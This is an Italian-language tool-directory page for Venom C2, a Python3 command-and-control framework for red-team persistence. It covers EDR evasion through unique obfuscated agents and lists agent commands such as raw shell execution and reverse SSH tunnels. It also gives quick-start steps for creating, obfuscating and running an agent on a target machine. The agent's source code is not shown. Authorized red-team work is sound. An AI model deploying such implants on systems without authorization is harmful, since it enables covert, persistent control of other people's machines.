Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
venom — Venom C2 è un framework Command & Control in Python3 senza dipendenze per la persistenza redteam | Kitploit
Strumenti/GitHubGitHub/boku7/venom
Strumenti di Crittografia/DecrittografiaGenerazione di PayloadMeccanismi di PersistenzaMovimento LateraleShellcodePost-ExploitCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubboku7/venom

venom

Venom C2 è un framework Command & Control in Python3 senza dipendenze per la persistenza redteam

436759 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Venom C2

Venom C2 è un framework Command & Control in Python3 senza dipendenze, creato per la persistenza in redteam e progettato per funzionare su sistemi senza installare pacchetti. Comprende un team server Flask, una GUI operator basata su Electron e un agente Python in un singolo file che comunica su HTTP/HTTPS utilizzando messaggi JSON cifrati AES configurabili. Usalo per eseguire comandi, gestire file, mantenere l'accesso e creare tunnel inversi SSH da sistemi compromessi.

Contesto

Durante l'escalation dei privilegi di rete ci siamo imbattuti in molti sistemi di produzione con distro e architetture esotiche. Volevamo impostare la persistenza, ma il nostro arsenale di strumenti e tecniche non funzionava. Inoltre, alcuni sistemi target eseguivano EDR.

Erano sistemi di produzione, quindi non volevamo installare pacchetti. Avevamo bisogno di un agente C2 che funzionasse senza dipendenze. I sistemi avevano Python3 installato, così ho creato Venom C2 a metà impegno: un agente C2 in Python3 senza dipendenze che funziona e basta.

Non volevamo usare agenti C2 già pronti perché il rischio era che potessero essere rilevati dalla blue team. Il codice unico è fondamentale per bypassare gli EDR moderni

Poiché c'erano molti sistemi, abbiamo automatizzato offuscamento unico, naming, posizionamento nel filesystem, domini di callback di rete differenti e richieste di percorsi di rete unici per ogni agente.

L'ho chiamato Venom perché mio figlio adora il cattivo Venom di Spider-Man. Inoltre Python è un serpente e i serpenti fighi hanno il veleno, quindi mi è sembrato un buon abbinamento.

Futuro di Venom C2

Non c'è.

Questo è stato solo un progetto C2 occasionale che ho realizzato a metà impegno. Ci sono voluti circa 2 giorni di sviluppo per renderlo stabile e affidabile nell'ambiente target. Ha fatto il suo lavoro, dandoci la persistenza nella rete per le restanti 6 settimane dell'impegno. Non ho piani per continuare a sviluppare o usare questo progetto, quindi ho pensato che fosse un buon candidato da rilasciare pubblicamente.

Altrimenti sarebbe andato perso nel devNULL...

devnull

Componenti e funzionalità di Venom C2

Server

  • Flask Python3
  • Team server che supporta più operatori
  • Salva la cronologia dei comandi
  • Script per la configurazione degli agenti
  • Script per l'offuscamento degli agenti
  • Gestisce le connessioni degli agenti
  • API per comunicare con il client GUI
  • Profili personalizzati con selezione casuale da grandi array di:
    • Nomi dei parametri dei messaggi C2
    • Header casuali
    • Attributi JSON casuali con tipi di valore scalabili

Client GUI

  • Electron
  • Funziona su Linux, macOS, Windows
  • La GUI è una versione ridotta della GUI Loki

Agente

  • Python3 senza dipendenze
  • I messaggi sono cifrati con chiavi AES configurabili
  • Tutti i messaggi vengono inviati come richieste POST JSON
  • Profili personalizzati con selezione casuale da grandi array di:
    • Percorsi base URI (utili per configurare il routing del reverse proxy)
    • Più percorsi URI per ogni funzione dell'agente
    • Nomi dei parametri dei messaggi C2
    • User agent
    • Header casuali
    • Attributi JSON casuali con tipi di valore scalabili

Comandi dell'agente

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Display this help menu
ls       : List directory contents
pwd      : Show current working directory
cd       : Change directory
cat      : Display file contents
mv       : Move/rename files or directories
cp       : Copy files or directories
mkdir    : Create directory
rmdir    : Remove empty directory
write    : Write content to file
chmod    : Change file permissions
rm       : Remove (delete) files
shell    : Execute raw shell command
sleep    : Make agent sleep with optional jitter
sshrev   : Create reverse SSH tunnel
kill     : Terminate agent process
upload   : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box

Avvio rapido

1. Ottieni il codice sul tuo server

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. Installa i requisiti del server (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. Avvia il server

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • Al primo avvio vengono generati nome utente e password admin stampati nella console. Copiali e conservali per autenticare il client sul server.
  • Oppure impostali tu: python3 server.py --adduser <USERNAME> <PASSWORD>

4. Esegui il client sulla workstation

Esegui la UI client sulla tua workstation (non sul server). Deve poter raggiungere il server.

root@kitploit:~
cd ../client
npm install
npm run start

Apri il client, vai su Config e inserisci le credenziali del server.

Sicurezza

Il percorso base dell'API client del server è /api/. Non esporre /api/ su internet pubblico. Usa una VPN o regole restrittive di firewall/reverse-proxy in modo che solo i client fidati possano raggiungerlo.

5. Crea un agente

Dalla directory server:

root@kitploit:~
python3 agent_create.py -H <server_host> -P <server_port> [-http]

6. Offusca l'agente

Dalla directory server:

root@kitploit:~
python3 agent_obfuscate.py agents/<generated_agent_file>.py

7. Esegui l'agente

Da eseguire sul computer target che vuoi controllare.

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
Scarica lo strumento